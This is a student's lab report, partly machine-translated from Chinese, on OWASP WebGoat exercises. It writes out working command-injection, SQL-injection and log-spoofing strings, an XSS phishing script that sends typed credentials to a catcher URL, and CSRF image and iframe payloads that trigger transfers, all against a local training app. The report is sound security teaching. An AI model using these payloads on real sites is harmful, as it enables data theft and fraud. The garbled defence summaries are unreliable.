2018-2019-2 against network technology 20165324 Exp9: Web Security Essentials

2018-2019-2 against network technology 20165324 Exp9: Web Security Essentials

Under the experimental class

• Experiment Content Overview
  • Webgoat ready
  • SQL injection attacks
  1. Command Injection (Command Injection)
  2. Digital-type implant (Numeric SQL Injection)
  3. Log deceive (Log Spoofing
  4. SQL injection (LAB: SQL Injection)
  5. String injection (String SQL Injection)
  6. Blind numeric injection (Blind Numeric SQL Injection)
  • XSS attacks
  1. XSS 钓鱼（Phishing with XSS）
  2. Storage type XSS attacks (Stored XSS Attacks)
  3. Reflective XSS attacks (Reflected XSS Attacks)
  • CSRF attacks
  1. CSRF (Cross Site Request Forgery (CSRF))
  2. Bypass CSRF acknowledgment (CSRF Prompt By-Pass)
• Basic questions answered
  • SQL Injection Attacks, how to defend
    • Principle: SQL injection vulnerability refers to a security vulnerability in a Web application back-end database query processing exist. That is, the embedded SQL commands in the input string, from checking the special string may constitute an attack in the design process. After the back-end database to be regarded as a normal SQL commands executed normally possible to achieve back-end database to perform various operations, even causing serious consequences such as damage to back-end database
    • Defense: Turn off or remove unnecessary interactive submit the form page; general user and system administrator user privileges have strict distinction; do not place the backup file on the server side to avoid being infected, or backup files contain loopholes, causing entry point.
  • Principle XSS attack, how to defend
    • Principle: An attacker to insert malicious Web page in html tag or javascript code when a user visits the page, or to perform certain operations, attackers exploit users' trust in the original site, or browser to trick users into performing some unsafe operation or submit private information of users to other sites.
    • Defense ways: Web developers use tools such as the escape character safe, and adhere to the principle of time do not believe in any form of user input data submitted for testing special characters; do limit the length of the input box;
  • CSRF attacks principle, how to defend
    • Principle: CSRF is false login. The core essence of cross-site forgery request steal user Session, or Cookie, because the current situation mainstream> Session Cookie is a presence in. An attacker does not care about the victim's specific account and password, because once the user login, Session is the only evidence the user, as long as the attacker can get Session, can be disguised as the victim into the server. mainly when to enter a user name and password to access the site a, after validation, site a generates Cookie information and returns, this time visit the website A successful website can normally send a request to A. Before the exit site is not A, B when accessing another, Site B may return some attack code and request access to website A; thus, at the request of the site B, to the requesting site A. A Web site but do not know the request is malicious, so it will execute the malicious code
    • Defense ways: using a token, each page comprises a web server token generated, the time of filing, the token also submitted to the server, the server determines if the token does not conform, it is determined that there CSRF attacks; method of submission replaced by post, or a GET request to only browse without changing the server-side resources; regularly clean cookie.
• Experiments and experience summary
  • The experiment I found myself learned a lot of new knowledge on the content network attack and defense also have a deep understanding and experience, although many aspects of the study was not thorough enough, but they still control the content based on a lot, it is very rewarding.

Content 9.1: WebGoat

• Description: WebGoat is OWASP organization developed a platform for web application vulnerability experiment to illustrate the security vulnerabilities exist in the web application. WebGoat run on platforms with java virtual machine, currently provide more than 30 training courses, including: cross-site scripting attacks (XSS), access control, security thread, operating hidden field, parameter manipulation, weak session cookie , SQL blinds, digital type SQL injection, SQL injection string, web services, Open Authentication failure, dangerous HTML comment and so on. WebGoat provides a series of tutorials to learn web security, some courses are also given a video presentation, guide the user to exploit these vulnerabilities to attack.

• Download webgoat-container-7.0.1-war- exec.jar file

• Command in the directory of the file containing the java -jar webgoat-container-7.0.1-war-exec.jarrun Webgoat, a message appears: Starting ProtocolHandler ["http-bio-8080"]Description Open, you can view occupied port 8080, the experiment can not close the terminal.

• In the browser input http://localhost:8080/WebGoatinto the WebGoat login interface directly with the default user name and password to log in. (If the page wrong, probably JDK versions are not compatible, reference links: https://www.jianshu.com/p/9ec7838411c8 )

Content 9.2: SQL injection attacks (Injection Flaws)

1. injection command (Command Injection)

• Principle: the submission process add malicious code to execute an instruction in normal parameters.

• Goal: you can execute any system commands on the target host

- method of operation:

• Right-click on the page, select inspect Elementthe review page elements to modify the source code, any column of the code in the box, right-click, select Edit At Htmlmodify, add "& netstat -an & ipconfig".

• Click the view, you can see the network port usage and the IP address of the instruction is executed. Successful attack!

2. The digital type implant (Numeric SQL Injection)

• Principle: injection feature characters in the station field, combined into a new SQL statement.
  Such as: SELECT * FROM weather_data WHERE station = [station]

• Objective: This example View all weather data via SQL injection strings.

• How:
  Right-click on the page, select inspect Elementthe review page elements to modify the source code, add the numbers in the selected city in the Value value or 1=1.

• Weather conditions show all cities, the attack is successful!

3. Log deceive (Log Spoofing)

• Principle: to fool the human eye in the log file, an attacker can use this way to clear their traces in the log
• Target: Record the contents of the gray area represents the log of the Web server, our aim is to use the username is "admin" user "Success Login" in the log
• Methods of operation:
  • Premise: The title accept any user input a user name and appends it to a log file.
  • Using the carriage return (0D%) and line feed (% 0A), fill in the usernamehcj%0d%0aLogin Succeeded for username: admin

4. SQL injection (LAB: SQL Injection)

• Stage 1: the injection string (Stage 1: String SQL Injection)

• Principle: bypass authentication by injecting a string

• Methods of operation:
  • Right-click on the page, select inspect Elementthe review page elements to modify the source code, limit the maximum length of the password box password changed to 20.

- 以用户Smith 登录，输入密码```Smith' or 1=1--```
- 得到所有人员列表，攻击成功！

• Stage 3: numeric SQL injection (Stage 3: Numeric SQL Injection)

• Principle: by injecting numeric data, bypassing the authentication, by an ordinary employee accounts, view the user information of BOSS.

• Methods of operation:
  • User name Larry, larry click login password log on, click ViewProfile view the user information
  • Right-click on the page, select the page elements inspect Element review the source code, we can see that the database index is based on employee ID, presumably it returned each time to the first query data.
  • Explained by social engineering boss should be the highest wages, so the value of employee ID changed 101 or 1=1 order by salary desc, so that the information owner as the first query to the data.
  • Get the boss's account information, the attack is successful!

The injection string (String SQL Injection)

• Principle: to construct your own SQL injection strings based on the following query.

SELECT * FROM user_data WHERE last_name = '?' 

• Goal: The following table allows users to view their credit card number. SQL injection attempts by all credit card information will be displayed. Try the user name is "Smith".

• Methods of operation:
  • Under normal circumstances only query the user name corresponding to the credit card number
  • Enter the query the user name Smith' or 1=1--(Smith and conditions have become 1 = 1 query and 1 = 1 is the identity, it can query all the data tables inside)
  • 得到所有用户的信用卡号码,攻击成功!

6. 数字型盲注入（Blind Numeric SQL Injection）

• 原理:某些SQL注入是没有明确返回信息的，只能通过条件的“真”和“假”进行判断。攻击者必须充分利用查询语句，构造子查询语。

• 目标：该题目允许输入一个帐号，并检测该帐号是否合法。使用该表单的返回信息（真或假）测试检查数据库中其它条目信息。我们找到 pins 表中 cc_number 字段值为 1111222233334444 的记录中 pin 字段的数值。pin 字段类型为 int，整型。输入找到的数值并提交，通过该题目。

• 操作方法：
  • 本题目中，服务端页面返回的信息只有两种：帐号有效或无效。因此无法简单地查询到帐号的PIN数值。但我们可以利用系统后台在用的查询语句SELECT * FROM user_data WHERE userid=accountNumber;

  • 如果该查询语句返回了帐号的信息，页面将提示帐号有效，否则提示无效。使用 AND 函数，我们可以添加一些额外的查询条件。如果该查询条件同样为真，则返回结果应提示帐 号有效，否则无效。

  • 针对查询语句的后半部分构造复杂语句,如:101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 5000 );如果提示无效，则pin值小于5000,使用二分法，最终得出pin的值为2364

内容9.3：XSS攻击

• 跨站脚本攻击是通过HTML注入劫持用户的浏览器，任意构造用户当前浏览的HTML内容，可以模拟用户当前的操作。这里实验的是一种获取用户名和密码的攻击。

1. XSS 钓鱼（Phishing with XSS）

• 原理：当用户输入非法HTTP响应时容易受到XSS攻击。在XSS的帮助下，可以实现钓鱼工具或向某些官方页面中增加内容。对于受害者来说很难发现该内容是否存在威胁。

• 目标：创建一个 form，要求填写用户名和密码。将数据提交到 http://localhost/WebGoat/catche r?PROPERTY=yes&user=catchedUserName&password=catchedPasswordNam

• 操作方法：
  • 利用XSS可以在已存在的页面中进一步添加元素，包括两部分：
    • 受害人填写一个表格;
    • 服务器以读取脚本的形式，将收集到的信息发送给攻击者。
      编写一段脚本读取被攻击者在表单上输入的用户名和密码信息，将这些信息发送给捕获这些信息的 WebGoat
  • 编写一个带用户名和密码输入框的表格

//脚本
</form>
<script>
    function hack(){ 
        XSSImage=new Image;
        XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
        alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
    } 
</script>
<form name="phish">
<br>
<br>
//表格
<HR>
    <H2>This feature requires account login:</H2>
<br>
    <br>Enter Username:<br>
    <input type="text" name="user">
    <br>Enter Password:<br>
    <input type="password" name = "pass">
<br>
    <input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>

2. 存储型XSS攻击（Stored XSS Attacks）

• 原理：这种攻击常见于论坛等留言平台，用户留言的时候输入一段JavaScript脚本，这段脚本就会被保存在数据库中。因为是留言，所以任何用户在打开网页的时候，这个脚本就会被从数据库中取出来而运行。

• 目标：写入非法的消息内容，可以导致其他用户访问时载入非预期的页面或内容

• 给用户发一个信息，用户在打开这个信息的时候触发了隐藏在信息里面js代码，然后被盗走了cookies

3. 反射型XSS攻击（Reflected XSS Attacks）

• 原理：在反射的XSS攻击中，攻击者可以使用攻击脚本创建一个URL，并将其发布到另一个网站、通过电子邮件或其他方式让受害者点击它。

• 目标：使用攻击脚本创建URL，并将其写入网站中，当读取到该URL的时候就会被攻击

• 操作方法：

  • 输入代码<script>alert("hello20165324");</script>，点击purse的同时页面就给出了反馈

内容9.4：CSRF攻击

1. 跨站请求伪造（Cross Site Request Forgery (CSRF)）

• 操作方法：
  • 查看页面右侧Parameters中的src和menu值，分别为276和900

- 在title中输入任何参数，message框中输入

<img src="http://localhost:8080/WebGoat/attack Screen=267&menu=900&transferFunds=5000" width="1" height="1" />

,以图片的的形式将URL放进Message框，这时的URL对其他用户是不可见的(宽高设置成1像素的目的是隐藏该图片)，用户一旦点击图片，就会触发一个CSRF事件，点击Submit提交
- 在Message List中生成以Title命名的消息。点击该消息，当前页面就会下载这个消息并显示出来，转走用户的5000元，从而达到CSRF攻击的目的。

2. 绕过 CSRF 确认（ CSRF Prompt By‐Pass）

• 操作方法：

  • 查看页面右侧Parameters中的src和menu值分别为276和900
  • 并在title框中输入学号，message框中输入代码：

  <iframe src="attack?Screen=276&menu=900&transferFunds=5000"> </iframe>
  <iframe src="attack?Screen=276&menu=900&transferFunds=CONFIRM"> </iframe>

  • 在Message
    List中生成以Title命名的链接，点击进入后，攻击成功。